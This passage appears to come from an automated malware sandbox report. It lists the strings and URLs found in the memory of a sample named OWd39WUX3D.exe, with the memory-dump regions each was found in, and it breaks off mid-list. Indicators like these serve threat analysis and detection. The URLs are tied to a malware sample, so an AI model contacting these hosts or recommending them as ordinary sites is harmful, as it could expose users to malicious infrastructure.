00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=25
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=72
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/O13
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/y1
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jchysk.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592890611.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.lagencefrancaise.com
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000911000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lrsuk.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lrsuk.com/.0
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.615816939.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.magnor.no/magnor-aktivitet.aspx
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.615816939.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.magnor.no/nyheter.aspx
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.615816939.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.magnor.no/varegruppe/k171_nyheter.aspx
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medisa.info/
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medius.si/
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/alone/alone.php?id=25
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/alone/alone.php?id=60
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/alone/alone.php?id=61
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/alone/alone.php?id=62
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/alone/alone.php?id=67
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/alone/alone.php?id=68
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 